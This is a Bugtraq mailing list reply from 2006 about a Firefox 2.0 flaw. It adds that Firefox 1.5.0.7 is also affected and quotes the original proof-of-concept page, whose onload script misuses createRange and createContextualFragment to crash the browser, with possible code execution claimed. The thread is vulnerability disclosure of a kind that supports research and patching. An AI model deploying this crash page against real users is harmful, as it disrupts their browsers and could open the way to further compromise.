Bugtraq mailing list archives
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
From: Gouki <Gouki () GoukiHQ org>
Date: Tue, 31 Oct 2006 19:05:14 +0000
Firefox 1.5.0.7 is also vulnerable (to DoS at least). On Tue, 2006-10-31 at 09:24 +0000, xxxx () gmail com wrote:
New Flaw in Firefox 2.0: DoS and possible remote code execution PoC here: http://werterxyz.altervista.org/Firefox2Range.htm <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script type="text/javascript"> function do_crash() { var range; range = document.createRange(); range.selectNode(document.firstChild); range.createContextualFragment('<span></span>'); } </script> </head> <body onload="do_crash()"> <p>Good bye Firefox!</p> </body> </html>
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- New Flaw in Firefox 2.0: DoS and possible remote code execution xxxx (Oct 31)
- Re: New Flaw in Firefox 2.0: DoS and possible remote code execution Gouki (Oct 31)
- Re: New Flaw in Firefox 2.0: DoS and possible remote code execution Josh Bressers (Oct 31)
- <Possible follow-ups>
- Re: Re: New Flaw in Firefox 2.0: DoS and possible remote code execution xxxx (Oct 31)
- Re: New Flaw in Firefox 2.0: DoS and possible remote code execution Daniel Veditz (Oct 31)